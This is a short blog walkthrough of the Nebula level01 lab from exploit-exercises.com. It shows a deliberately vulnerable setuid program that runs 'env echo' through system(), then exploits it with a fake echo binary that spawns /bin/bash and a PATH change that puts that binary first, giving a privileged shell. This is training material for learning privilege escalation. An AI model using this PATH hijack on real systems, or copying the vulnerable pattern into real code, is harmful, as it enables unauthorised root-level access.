Tuesday 10 April 2012

exploit-exercises.com walkthrough - Nebula level01

Here's the vulnerable source code:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?");
}
The binary file is located in /home/flag01/flag01. After executing it simply echoes the "and now what?" message. It's easy to spot that we have an absolute path to env but echo execution could be altered. We'll achieve this by creating a simple C program in the /home/level01:
#include <stdlib.h>
#include <stdio.h>
void main()
{
       system("/bin/bash");
}

Now we need to compile it:
level01@nebula:~$ gcc -o echo 1.c
 In the next step we will alter the PATH variable value with the following command:
level01@nebula:~$ PATH=/home/level01:$PATH
All we need to do now is running flag01.
level01 completed.

That's it !